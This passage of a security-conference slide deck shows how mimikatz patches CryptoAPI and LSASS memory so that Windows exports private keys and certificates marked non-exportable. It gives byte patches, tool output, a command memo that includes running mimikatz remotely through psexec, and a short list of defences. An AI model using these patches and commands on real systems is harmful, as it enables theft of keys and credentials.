            Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

43 mimikatz :: crypto :: patchcapi because I own my process
So what? A module in my own process tells me that I can't do something? CryptoAPI is in my memory space, let's patch it! I wrote "4" bytes in my memory space:
    before: .text:0AC0B7CB 0F C7 FF FF         jnz continue_key_export_or_archive
    after:  .text:0AC0B7CB                     nop
            .text:0AC0B7CC E9 33 C7 FF FF      jmp continue_key_export_or_archive
    before: .text:0AC1F749 0F 85 B6 3B FF FF   jnz continue_key_export_or_archive_prepare
    after:  .text:0AC1F                        nop
            .text:0AC1F74A E9 B6 3B FF FF      jmp continue_key_export_or_archive_prepare

44 mimikatz :: crypto :: patchcapi demo time !
Import, export, import as not exportable…, export.

45 mimikatz :: crypto :: patchcapi limitations
Because I'm lazy, and because in the majority of real-life cases I've seen RSA keys (Elliptic Curve a little...), mimikatz crypto::patchcapi only deals with:
  - Microsoft Base Cryptographic Provider v1.0
  - Microsoft Enhanced Cryptographic Provider v1.0
  - Microsoft Enhanced RSA and AES Cryptographic Provider
  - Microsoft RSA SChannel Cryptographic Provider
  - Microsoft Strong Cryptographic Provider
...all based on rsaenh.dll

46 mimikatz :: crypto :: cng how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior."
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context: the process uses RPC to call "Key Isolation service" (keyiso) functions.
It seems more secure than CryptoAPI... It is, but it's not perfect...

47 mimikatz :: crypto :: cng how it’s exported (PLAYSKOOL level)
Diagram (NT6): the KeyIso service runs in the LSASS process, a system protected process (ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP).
  - Process -> RPC -> KeyIso (CNG): ask to export key
  - KeyIso: load private key -> DPAPI decode -> exportable?
  - yes: exported key
  - no: NTE_NOT_SUPPORTED

48 mimikatz :: crypto :: patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass(keyiso):ncrypt!SPCryptExportKey. This function does all the work to prepare the export, and checks whether the key is exportable. Exportable?
    mimikatz # crypto::exportKeys
    [user]
    Clés CNG :
     - cng_user_noexport-a e5b-4b9a-bf08-d35d75a9b318
            Exportabilité : NON
            Taille clé : 2048
            Export privé dans 'cng_user_0_cng_user_noexport-a e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
            mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : (0x ) L'opération demandée n'est pas prise en charge.

49 mimikatz :: crypto :: patchcng because sometimes I own LSASS
This time, the checks and the keys are in the LSASS process... And what? I wrote "1" byte in the LSASS memory space:
    before: .text:6C C       jnz short continue_key_export
    after:  .text:6C EB 1C   jmp short continue_key_export

50 mimikatz :: crypto :: patchcng demo time !
Import, export, import as not exportable…, export again.

51 mimikatz :: crypto :: patchcng limitations
The patch operation needs some privileges: Admin (debug privilege) or SYSTEM.
mimikatz crypto::patchcng only deals with the Microsoft Software Key Storage Provider (maybe other algorithms than RSA).
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates... even those that are exportable (hu?). certutil can...

52 mimikatz :: crypto :: patchcng bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports until reboot / KeyIso service restart.
Some other programs that don't check the export flag before asking for the export can work too. Yeah, like the good old one: certutil
    C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
    MY
    ================ Certificat 1 ================
    […]
    Hach. cert. (sha1) : dc 00 c9 c7 9f f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
    Conteneur de clé = cng_user_noexport-a e5b-4b9a-bf08-d35d75a9b318
    Fournisseur = Microsoft Software Key Storage Provider
    La clé privée NE PEUT PAS être exportée
    Succès du test de chiffrement
    CertUtil : -exportPFX ÉCHEC de la commande : 0x b ( )
    CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
    CertUtil: -exportPFX La commande s'est terminée correctement.

53 mimikatz :: crypto memo
Some commands:
    mimikatz crypto::patchcapi crypto::exportCertificates exit
    psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
    mimikatz # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
    mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password: PFX files are protected by this password: mimikatz
Keys: when you import a certificate multiple times, exportable or not, Windows makes duplicate keys. When you delete a certificate, Windows does not delete its private key... funny, isn't it? So yes, mimikatz can export it.

54 mimikatz :: crypto what can we do ?
Exactly the same as for sekurlsa: it will prevent access to accounts / computers! No admin, no admin, no admin...
Basics:
  - Use smartcards/tokens for user certificates
  - Use Hardware Security Modules (HSM), even SoftHSM
More in depth:
  - See what Microsoft can do with the TPM from Windows 8: Virtual SmartCard seems promising
  - Verify vendors' implementations (Lenovo, Dell, ...) of TPM CSP/KSP: their biometrics stuff was a little buggy ;)

55 mimikatz what else can it do ?
  - Play with minesweeper
  - Manipulate some handles
  - Pass the hash
  - Dump SAM / AD
  - Stop event monitoring
  - Patch Terminal Server
  - Basic GPO bypass
  - Applocker / SRP bypass
  - Driver: play with tokens & privileges; display SSDT x86 & x64; list minifilter actions; list notifications (process / thread / image / registry); list object hooks and procedures

56 mimikatz that’s all folks !
Thanks to / Merci à:
  - my girlfriend for her support (her LSASS crashed a few times)
  - Application Security Forum for offering me this great opportunity
  - Partners and Sponsors, for sure!
  - Microsoft, for always considering it as normal/acceptable
  - Security friends/community for their ideas & challenges: nagual, newsoft, mubix, ...
  - You, for your attention!
Questions? Don't be shy ;) especially if you have written down the corresponding slide number

57 Blog, Source Code & Contact
Blog: blog.gentilkiwi.com
mimikatz source

